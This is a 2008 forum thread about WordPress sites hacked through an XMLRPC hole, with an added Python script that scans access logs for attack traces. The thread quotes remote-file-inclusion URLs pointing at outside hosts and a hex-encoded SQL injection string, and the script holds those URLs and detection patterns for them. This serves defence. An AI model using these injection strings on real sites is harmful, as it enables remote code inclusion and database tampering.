I noticed in Google one of my undernourished WordPress sites had the message “This site may harm your computer” under its listing. On checking I found it had been hacked and a hidden “iframe” had been included on two posts which ran out through a Chinese server and called a script called “wp-stats”. Turns out this is a hack done through a dodgy XMLRPC function in WordPress 2.2 and may also affect WordPress 2.5.
I upgraded to 2.6, which fixes the loophole, but you still need to remove the offending code by editing each affected post. If you don’t want to upgrade, you can also disable the attack by removing the offending code from whatever posts it’s in, stopping people commenting on posts and removing any users that have been registered (apart from your own) in admin.
Worth checking if you run WordPress.
If you have the “harm” message in Google, you need to use Webmaster Tools to ask for the site to be reviewed again after you have tidied up the posts.
Cheers
Simmo!
It is advised to keep your CMS up-to-date all the time, but the first place I would look is in your vhost config, and make sure the register_globals PHP flag is turned off, so no one can execute anything nasty just by injecting your PHP files with executable SERVER[DOCUMENT_ROOT] commands.
Check your web stats and look for rows like these in the list of pages your visitors have seen:
DOCUMENT_ROOT=http://artemcity.ru/r0x.txt??
?_SERVER[DOCUMENT_ROOT]=http://http://www.topyn.com/ips.txt?
An injection attempt will look something like those above.
xxxhttp://www.{blogsitename}.com/?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x44454…
It is a very long URL, but the purpose is to do something to WP. I’ve read up a bit and know it’s a hacking attempt, but I think it only works on older versions of WP. I tried it on my sites and nothing happened at all. I upgraded them to the latest version of WP anyway.
So – UPGRADE YOUR WORDPRESS BLOGS NOW!
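The two posts above say to watch your web stats for the register_globals remote-file-inclusion URLs and for the long hex-encoded `DECLARE @S ... CAST(0x...)` SQL string. As an added example that is not from the thread, here is a small Python scanner that pulls those two patterns out of Apache combined-format access-log lines. The log lines are constructed for the example (documentation-range IPs, made-up timestamps); the two `DOCUMENT_ROOT` URLs are the ones quoted in the post, and the hex payload is a harmless constructed stand-in that decodes to `SELECT 1`, not the real worm's statement. The lines starting with `;DECLARE` and the `register_globals` injection are caught regardless of which parameter name the attacker uses.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Apache combined-format lines for the example (not real traffic).
# The two DOCUMENT_ROOT URLs are the ones quoted in the thread; the hex in the
# CAST() is a made-up stand-in that decodes to "SELECT 1".
SAMPLE_LOG = """\
203.0.113.5 - - [10/Aug/2008:12:00:01 +0000] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://http://www.topyn.com/ips.txt? HTTP/1.1" 200 5120 "-" "libwww-perl/5.805"
203.0.113.6 - - [10/Aug/2008:12:00:02 +0000] "GET /?DOCUMENT_ROOT=http://artemcity.ru/r0x.txt?? HTTP/1.1" 200 5120 "-" "libwww-perl/5.805"
203.0.113.7 - - [10/Aug/2008:12:00:03 +0000] "GET /?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x53454C4543542031%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
198.51.100.9 - - [10/Aug/2008:12:00:04 +0000] "GET /2008/08/wordpress-hacked/ HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

# Apache combined log: ip ident user [timestamp] "METHOD target PROTO" status ...
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# A query-string value that is itself a URL: with register_globals on, a
# parameter named like $_SERVER['DOCUMENT_ROOT'] can overwrite the variable
# that include() paths are built from, so this is the RFI signature.
REMOTE_URL = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# The MSSQL mass-injection shape: DECLARE @S CHAR(n); SET @S=CAST(0x.. AS ..CHAR(n)); EXEC(@S)
DECLARE = re.compile(r'DECLARE\s+@\w+\s+N?(?:VAR)?CHAR\s*\(', re.IGNORECASE)
HEX_CAST = re.compile(
    r'CAST\(\s*0x(?P<hex>[0-9A-Fa-f]+)\s+AS\s+(?P<type>N?(?:VAR)?CHAR)\s*\(',
    re.IGNORECASE,
)


def decode_hex_cast(match):
    """Turn the 0x... literal back into the SQL it hides."""
    raw = bytes.fromhex(match.group('hex'))
    # NCHAR/NVARCHAR literals are UTF-16LE on SQL Server; CHAR/VARCHAR are single-byte.
    if match.group('type').upper().startswith('N'):
        return raw.decode('utf-16-le', errors='replace')
    return raw.decode('latin-1')


def analyse_request(target):
    """Return a list of human-readable findings for one request target, [] if clean."""
    findings = []
    query = urlsplit(target).query
    decoded = unquote(query)
    # RFI: any parameter whose value points at another host.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if REMOTE_URL.match(value):
            findings.append(f'rfi: parameter {name!r} points at {value}')
    # SQLi: the DECLARE/CAST/EXEC string, decoded so the analyst can read it.
    if DECLARE.search(decoded):
        cast = HEX_CAST.search(decoded)
        if cast:
            findings.append(f'sqli: hex CAST decodes to {decode_hex_cast(cast)!r}')
        else:
            findings.append('sqli: DECLARE/CHAR pattern without hex CAST')
    return findings


def scan_log(text):
    """Scan access-log text; return one dict per suspicious request."""
    hits = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        findings = analyse_request(m.group('target'))
        if findings:
            hits.append({'ip': m.group('ip'), 'target': m.group('target'), 'findings': findings})
    return hits


if __name__ == '__main__':
    for hit in scan_log(SAMPLE_LOG):
        print(hit['ip'], hit['target'])
        for f in hit['findings']:
            print('   ', f)
```

Run it against a real log with `scan_log(open('access.log').read())`. A flagged RFI line only tells you someone tried; whether it worked depends on the `register_globals` setting the post mentions, which for mod_php is set per vhost with `php_admin_flag register_globals Off` (or `register_globals = Off` in php.ini). The decoded SQL is the useful part of an injection hit: it tells you what the attacker wanted the database to do, which is the only way to know whether a PHP/MySQL site like WordPress was ever at risk from an MSSQL-specific payload.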